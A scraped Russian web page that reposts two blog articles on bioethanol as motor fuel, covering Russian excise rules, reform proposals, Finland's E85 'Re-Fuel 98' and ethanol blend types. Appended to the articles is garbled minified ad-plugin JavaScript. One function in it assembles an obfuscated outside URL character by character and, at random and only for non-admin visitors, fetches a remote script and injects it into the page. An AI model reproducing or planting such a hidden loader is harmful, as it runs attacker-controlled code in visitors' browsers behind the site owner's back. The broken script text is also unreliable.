     В США толчок биоэтанолу дал, среди прочего, запрет на использование в бензине МТБЭ — самого распространенного, но считающегося вредным октаноповышающего компонента. Переработчикам все равно нужны оксигенаты(добавки, повышающие октановое число), и биоэтанол может стать хорошей альтернативой.    Наличие кислорода в спирте способствует более полному сгоранию топлива и, следовательно, меньшему содержанию токсичных продуктов в отработавших газах (по разным оценкам — от 25 до 30%). При этом биоэтанол имеет и ряд других преимуществ перед бензином:* пары этанола рассеиваются быстрее;* он менее токсичен, не содержит канцерогенных компонентов;* его пары менее огнеопасны (из-за более высокой температуры самовоспламенения);* текучесть этанола выше, благодаря чему нет проблем с работой двигателя в холодную погоду;* электропроводность спирта значительно выше, что снижает возможность накопления статического электричества при движении топлива (в том числе и в топливной системе);* октановое число смешения этанола превышает 120 единиц.     В последнее время в России также появился значительный интерес к использованию этанола в составе моторных топлив. Причин тому несколько, главными из которых являются общемировые тенденции и желание отечественных компаний выйти со своими бензинами на европейских потребителей. Вместе с тем, производство этанола позволило бы нашей стране найти легальное применение тому избытку изготавливаемого у нас спирта, который так или иначе ищет выхода на рынок, как правило — на черный.    За последние года были предприняты определенные шаги для налаживания в стране процесса производства топливного этанола. В частности, в Общероссийский классификатор продукции внесена отдельная подгруппа 02 5140 «Альтернативные виды топлива», в составе которой выделена позиция 02 5142 «Этанольное моторное топливо с содержанием этанола свыше 5% по объему для двигателей внутреннего сгорания с принудительным зажиганием». С1 июля 2004 г. введен в действие национальный стандарт ГОСТ Р 52201-2004 — «Этанольное моторное топливо для автомобильных двигателей с принудительным зажиганием. Бензанолы. Общие технические требования». Разработан ряд технических условий на эту продукцию.

  •     Запрет на производство биотоплива в стране
  •     Перспективы создания и развития биотопливной(производство биоэтанола) отрасли в России
  • 1 шаг

    Дело в том, что с 2006 года вступили в действие изменения к Закону «О государственном регулировании производства и оборота этилового спирта, алкогольной и спиртосодержащей продукции» и к главе «Акцизы» Налогового кодекса РФ. Данное нововведение налагает дополнительные ограничения на производство и оборот спиртов, в том числе денатурированных, более того — вводится акциз. В результате принятия вышеназванных документов бензин, содержащий более 1,5% спирта, признается спиртосодержащей продукцией со всеми вытекающими последствиями: его изготовление и реализация подлежат лицензированию и специальному контролю со стороны налоговых органов. Новый акциз, в свою очередь, практически исключает саму возможность применения этанола в качестве моторного топлива, так как ставка слишком велика — 21,5 рубля за литр. Спиртосодержащие добавки облагаются столь же значительно -159 рублей за 1 л содержащегося в них спирта. Иначе говоря, в отличие от большинства развитых стран, где экономически и законодательно стимулируют использование спиртосодержащих добавок к моторным топливам, в России фактически введен запрет на производство и применение биоэтанола (на данный момент акцизы, налоги ещё были повышены).     Поправки, на наш взгляд, нужны следующие. Во-первых, бензин, содержащий не более 10% спирта, не должен приравниваться к алкогольной продукции и на него не должны распространяться соответствующие ограничения на производство и оборот.    Во-вторых, в Налоговом кодексе необходимо предусмотреть освобождение от акциза применительно как к топливному этанолу, так и к денатурированному спирту, используемому для его изготовления. Это освобождение может быть прямым, непосредственным, либо же начисление акциза должно сопровождаться последующим его вычетом, как это происходит при производстве неспиртосодержащей продукции с применением денатурированного спирта. При таком подходе возможность строгого налогового контроля над целевым использованием топливного этанола гарантирована.  

    И, наконец, в-третьих, следует предусмотреть систему экономического стимулирования выпуска топлив с этанолом. Вариантов здесь много. Это и субсидирование производителей спирта, что с успехом практикуется в Германии.

Это и снижение на 50% акциза на спиртосодержащий бензин, что имеет место с 2007 г. на Украине. Это и уменьшение акциза на бензины повышенного качества с улучшенными экологическими свойствами — об актуальности такой меры все чаще говорят у нас в России.

Так или иначе, но вопрос надо решать, и уже сейчас, не откладывая.

     В России ежегодно выпускается примерно 40 млрд литров. Замена 2% на топливный спирт в соответствии с нормами, принятыми в ЕС, потребует 800 млн л. этанола. На первом этапе большинство этанола может выпускаться на существующих спиртзаводах.

     Стимулирование продавцов(сеть автозаправок) бензинов с добавкой этанола. Да и самим производителям это выгодно, т.к. нефть не бесконечна. Отработка технологии производства топлив с добавкой биоэтанола позволит ведущим фирмам выходить на зарубежный рынок не только по этанолу, но и самому топливу.     Продвижение более мощного бензина Е10, Е20,  с эффектом моющих присадок, защищающих двигатель, позволит развить и поднять имидж компании, производящей, продвигающей такие бензины. К тому же позволит компании носить имя передовой, использующей современные технологии, и стремящейся к экологическому образу жизни.

2 шаг

     По мере увеличения объемов производства топлива с биоэтанолом. Переходить на производство биоэтанола 2 поколения(получение топлива из целлюлозы, биогаза из отходов сельхозпроизводва), производство которого уже в России существует и опробовано.   Производство не из зерна и другой продукции, а из отходов лесообрабатывающей, сельскохозяйственной промышленности.

3 шаг

    Внедрение топлива полностью на биоэтаноле. Как это сделано в Бразилии. Правда это потребует измений в настройках двигателя и частичной доработке. Это уже вопрос к производителям автотехники и обслуживающих компаний, также и к законодателям.

    Источник

Источник: https://ecology-ru.livejournal.com/1230172.html

98 по 0.85€ за 1 литр

?

Categories: Находясь в забугорье заметил на заправке 98 по 0.85€ и рядом 95 по 1.7€. Хотел спросить у многоуважаемых гал4ат «шо це токое?» но ужо сам нагуглил. Поэтому просто оставлю здесь для общего развития:

На финских автозаправках ST-1 появилось загадочное топливо под названием Re-Ruel 98. Цена этого топлива значительно ниже обычного 95 и 98 бензина.Итак, что же это за топливо такое?!

Мы потратили некоторое время на изучение этого вопроса и узнали, что re fuel 98 соответствует мировому стандарту Е85 — смесь 85 % этанола и 15 % бензина. Кто не знает, этанол — это самый обыкновенный спирт. Любителям выпить сразу скажу: пить это нельзя! Спирт не очищен и содержит сивушные масла, ну и 15% бензина!  Re fuel 98 производится в Финляндии. Между прочим и в обычный автомобиль заливать такое топливо тоже нельзя (хотя это спорный вопрос…). Почему спросите вы? – Потому что это топливо предназначено для Flex-fuel машин (машин с двигателем, способным работать на различных видах топлива и их смесях). Таких машин пока что немного.

Теперь немного фактов и общей информации:

Топливо Re-Ruel 98 изготовляется из отходов, подробная информация на официальном сайте:http://www.st1.fi/index.php?id=2798

Ну и остальная тягамотина:

Биоэтанол — обычный этанол, получаемый в процессе переработки растительного сырья для использования в качестве биотоплива. Мировое производство биоэтанола в 2005 г. составило 36,3 млрд литров, из которых 45 % пришлось на Бразилию и 44,7 % — на США.

Этанол в Бразилии производится преимущественно из сахарного тростника, а в США из кукурузы. Производство этанола из тростника на сегодняшний день более экономически выгодно, чем из кукурузы. Федеральное правительство США предоставляет производителям этанола налоговый кредит (но не субсидии).

Бразильский этанол дешев из-за низких заработных плат у сборщиков сахарного тростника.

США в августе 2005 года приняли «Энергетический Билль» (Energy Policy Act of 2005), и «Стандарт возобновляемых топлив» (Renewable Fuels Standard). Они предусматривают производство к 2012 году ежегодно 30 миллиардов литров этанола из зерновых и 3,8 миллиарда литров из целлюлозы (стебли кукурузы, рисовая солома, отходы лесной промышленности и т.д.).

Биоэтанол является эффективной высокооктановой топливной добавкой для бензина.

При смешивании биоэтанола с бензином увеличивается октановое число топлива, значительно уменьшается выброс вредных веществ в атмосферу, снижается температура сгорания топлива, что увеличивает рабочий ресурс двигателя и не требует его дополнительного переоснащения.

По данным лабораторных исследований для получения автомобильного топлива с октановым числом 92 необходимо смешать 1 часть биоэтанола и 10 частей бензина с октановым числом 76.

Целью применения топливного этанола в США и в Европе является сокращение загрязнений воздуха, обеспечение потребностей растущего автопарка, уменьшение импорта энергоносителей и развитие сельского хозяйства.

Но на этом пути игроки сталкиваются с разными проблемами: производство этанола из биоресурсов – довольно дорогой процесс.

Во всех трех «ключевых» регионах (США, Западная Европа, Бразилия) оно стимулируется государством…

Во время стокилометровой поездки в спокойном стиле между шведскими городами Умеа и Орнскольдсвик Ford Focus FFV съел 12,5 литра топлива. Не многовато ли для мотора объемом 1,8 л? Если бы речь шла о бензине, то такой бы расход насторожил.

Но в баке машины был — этиловый спирт! Вернее, его смесь с бензином — Е-85, которая в Швеции, а теперь и в Финляндии существенно дешевле обычного горючего, полученного из нефти.

А главное — то, что, сжигая в цилиндрах этанол,  автолюбитель участвует в круговороте углекислоты в природе.

Чем спирт лучше и экологичнее бензина? Прежде всего тем, что, в отличие от нефти, это возобновляемый источник энергии. Ведь этанол можно получать из растительного сырья — например, из тростника. А на месте старого тростника вырастет новый.

Причем по мере роста он в процессе фотосинтеза поглощает из атмосферы СО2 — тот самый углекислый газ, который вызывает глобальное потепление. Получается круговорот.

Тростник поглощает СО2, потом из его стеблей сделают спирт, спирт сгорит в цилиндрах этого Фокуса, а выделившийся в атмосферу углекислый газ пойдет на фотосинтез для очередной порции тростника для автомобильного топлива. И нефть цела, и экологи довольны!

Этанол как топливо

Этанол является менее «энергоплотным» источником энергии, чем бензин,  пробег машин, работающих на Е85 (смесь 85 % этанола и 15 % бензина — буква «Е» от английского Еthanol), на единицу объёма топлива составляет примерно 75 % от пробега стандартных машин.

Обычные машины не могут работать на Е85, хотя прекрасно бегают на Е10 (некоторые утверждают, что можно использовать даже Е15). На «настоящем» этаноле могут работать только так  называемые машины «Flexible-fuel». Эти автомобили также могут работать на обычном бензине или на произвольной смеси того и другого.

Бразилия является лидером в производстве и использовании биоэтанола из сахарного тростника в качестве топлива. Автозаправки в Бразилии предлагают на выбор либо Е20 (иногда Е25) под видом обычного бензина, либо «acool» Е100, азеотроп этанола (96 % С2Н5ОН и 4 % (по весу) воды).

Пользуясь тем, что этанол дешевле бензина, недобросовестные заправщики разбавляют Е20 азеотропом, так что его концентрация может негласно доходить до 40 %. Переделать обычную машину в «Flex-fuel» можно, но экономически нецелесообразно.

Топливные смеси этанола

Е5, Е7, Е10 — смеси с низким содержанием этанола (5, 7 и 10 весовых процентов, соответственно), наиболее распространённые в наши дни. В этих случаях добавка этанола не только экономит бензин путём его замещения, но и позволяет удалить вредную окcигенирующую добавку МТБЭ.

Е85 — смесь 85 % этанола и 15 % бензина. Стандартное топливо для т. н. «Flexible-fuel» машин, распространённых, в основном в Бразилии, и в меньшей степени в других странах. Из-за более низкой энергоплотности продаётся дешевле чем бензин.

Е95 — смесь 95 % этанола и 5 % топливной присадки. Компания Scania начала разрабатывать дизельный двигатель для автобуса, работающий на 95% этаноле в середине 80-х годов. Создана программа испытаний городских автобусов с двигателями, работающими на 95% этаноле — BEST (BioEthanol for Sustainable Transport).

Е100 — формально 100 % этанол, однако в силу того что этанол гигроскопичен, получение и использование этанола без остаточной концентрации воды невыгодно.

Поэтому в большинстве случаев под Е100 подразумевают стандартную азеотропную смесь этанола (96 % С2Н5ОН и 4 % воды, (по весу); 93 % и 7 % в объёмных процентах).

Выше концентрацию этанола невозможно получить путём обычной дистилляции.

Подробно номенклатура смесей этанола и бензина используемых в качестве топлива в разных странах и машинах описана в английской статье Википедииhttp://www.finlandiaonline.ru/news/finlandia/culture/346-re-fuel-98-e85.html

И да, кто уже попробовал? Как динамика?

Источник: https://spb-auto.livejournal.com/21638318.html

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};